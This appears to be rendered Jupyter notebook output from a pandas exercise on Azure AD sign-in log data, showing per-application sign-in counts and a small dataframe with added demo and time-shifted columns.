"UserType | \n", "FlaggedForReview | \n", "IPAddressFromResourceProvider | \n", "SignInIdentifier | \n", "SignInIdentifierType | \n", "ResourceTenantId | \n", "HomeTenantId | \n", "Type | \n", "Result | \n", "Latitude | \n", "Longitude | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
AppDisplayName | \n", "\n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " | \n", " |
\n", " | 1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
ACOM Azure Website | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "... | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "0 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "
App Service | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "... | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "0 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "3 | \n", "
Azure AD Identity Governance - Entitlement Management | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
Azure Active Directory PowerShell | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "... | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "0 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "8 | \n", "
Azure Advanced Threat Protection | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "... | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "0 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "19 | \n", "
Azure DevOps | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "... | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "0 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "7 | \n", "
Azure Machine Learning Workbench Web App | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Azure Portal | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "... | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "0 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "884 | \n", "
Azure Synapse Studio | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Intranet | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
Microsoft 365 Security and Compliance Center | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "... | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "0 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "32 | \n", "
Microsoft App Access Panel | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "... | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "0 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "
Microsoft Azure Active Directory Connect | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "... | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "0 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "985 | \n", "
Microsoft Azure CLI | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "... | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "0 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "4 | \n", "
Microsoft Azure PowerShell | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
Microsoft Azure Purview Studio | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "... | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "0 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "75 | \n", "
Microsoft Cloud App Security | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "... | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "0 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "5 | \n", "
Microsoft Docs | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "... | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "0 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "10 | \n", "
Microsoft Edge | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Microsoft Invitation Acceptance Portal | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Microsoft Office 365 Portal | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Microsoft Power BI | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
Microsoft Stream Portal | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
My Apps | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
My Profile | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "... | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "0 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "6 | \n", "
O365 Suite UX | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "... | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "0 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "1 | \n", "
Office 365 SharePoint Online | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "... | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "0 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "11 | \n", "
Office365 Shell WCSS-Client | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "... | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "0 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "57 | \n", "
WindowsDefenderATP Portal | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "... | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "0 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "2 | \n", "
30 rows 68 columns
\n", "\n", " | AppCount | \n", "
---|---|
AppDisplayName | \n", "\n", " |
\n", " | 1 | \n", "
ACOM Azure Website | \n", "3 | \n", "
App Service | \n", "3 | \n", "
Azure AD Identity Governance - Entitlement Management | \n", "1 | \n", "
Azure Active Directory PowerShell | \n", "8 | \n", "
Azure Advanced Threat Protection | \n", "19 | \n", "
Azure DevOps | \n", "7 | \n", "
Azure Machine Learning Workbench Web App | \n", "2 | \n", "
Azure Portal | \n", "884 | \n", "
Azure Synapse Studio | \n", "2 | \n", "
Intranet | \n", "1 | \n", "
Microsoft 365 Security and Compliance Center | \n", "32 | \n", "
Microsoft App Access Panel | \n", "5 | \n", "
Microsoft Azure Active Directory Connect | \n", "985 | \n", "
Microsoft Azure CLI | \n", "4 | \n", "
Microsoft Azure PowerShell | \n", "1 | \n", "
Microsoft Azure Purview Studio | \n", "75 | \n", "
Microsoft Cloud App Security | \n", "5 | \n", "
Microsoft Docs | \n", "10 | \n", "
Microsoft Edge | \n", "2 | \n", "
Microsoft Invitation Acceptance Portal | \n", "2 | \n", "
Microsoft Office 365 Portal | \n", "2 | \n", "
Microsoft Power BI | \n", "2 | \n", "
Microsoft Stream Portal | \n", "2 | \n", "
My Apps | \n", "1 | \n", "
My Profile | \n", "6 | \n", "
O365 Suite UX | \n", "1 | \n", "
Office 365 SharePoint Online | \n", "11 | \n", "
Office365 Shell WCSS-Client | \n", "57 | \n", "
WindowsDefenderATP Portal | \n", "2 | \n", "
\n", " | TenantId | \n", "AppDisplayName | \n", "TimeGenerated | \n", "NewCol | \n", "Plus1Hr | \n", "
---|---|---|---|---|---|
0 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Microsoft Azure Active Directory Connect | \n", "2021-06-28 10:55:21.648000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 10:55:21.648000+00:00 | \n", "
1 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Microsoft Azure Active Directory Connect | \n", "2021-06-28 10:55:26.252000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 10:55:26.252000+00:00 | \n", "
2 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 11:36:15.896000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 11:36:15.896000+00:00 | \n", "
3 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 12:24:50.274000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 12:24:50.274000+00:00 | \n", "
4 | \n", "8ecf8077-cf51-4820-aadd-14040956f35d | \n", "Azure Portal | \n", "2021-06-28 12:24:44.957000+00:00 | \n", "Look at my new data! | \n", "2021-06-29 12:24:44.957000+00:00 | \n", "